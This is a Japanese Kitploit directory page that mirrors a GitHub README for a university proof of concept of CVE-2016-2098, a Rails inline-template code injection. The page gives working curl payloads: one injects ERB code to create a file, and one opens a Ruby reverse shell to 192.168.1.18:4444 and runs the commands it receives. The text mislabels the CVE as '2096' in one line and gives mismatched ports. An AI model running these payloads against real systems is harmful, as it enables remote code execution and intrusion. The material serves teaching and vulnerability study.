Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
rails-PoC-CVE-2016-2098 — 概念実証 CVE-2016-2098 | Kitploit
ツール/GitHubGitHub/alejandro-marting/rails-poc-cve-2016-2098
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubalejandro-marting/rails-poc-cve-2016-2098

rails-PoC-CVE-2016-2098

概念実証 CVE-2016-2098

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
19年前未レビュー

脆弱性の概念実証: CVE-2016-2098

@alejandro-marting による大学プロジェクト 脆弱性2096を確認できます。

使用環境:

  • rails 4.2.5.1
  • ビューに脆弱なコード app/views/poc/render1.html.erb が含まれています

![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

実行方法:

まず、以下のコマンドでRailsサーバーを起動します。

$ rvmsudo rails server -b 0.0.0.0 -p 80

次に、以下のコマンドでリモートコード実行を引き起こします。

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(rootedファイルが生成されます)

Rubyコードインジェクションによるリバースシェルを試したい場合は、次のコマンドを実行してください。

root@kitploit:~
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1

ご質問があればお気軽にご連絡ください!

ツールをダウンロード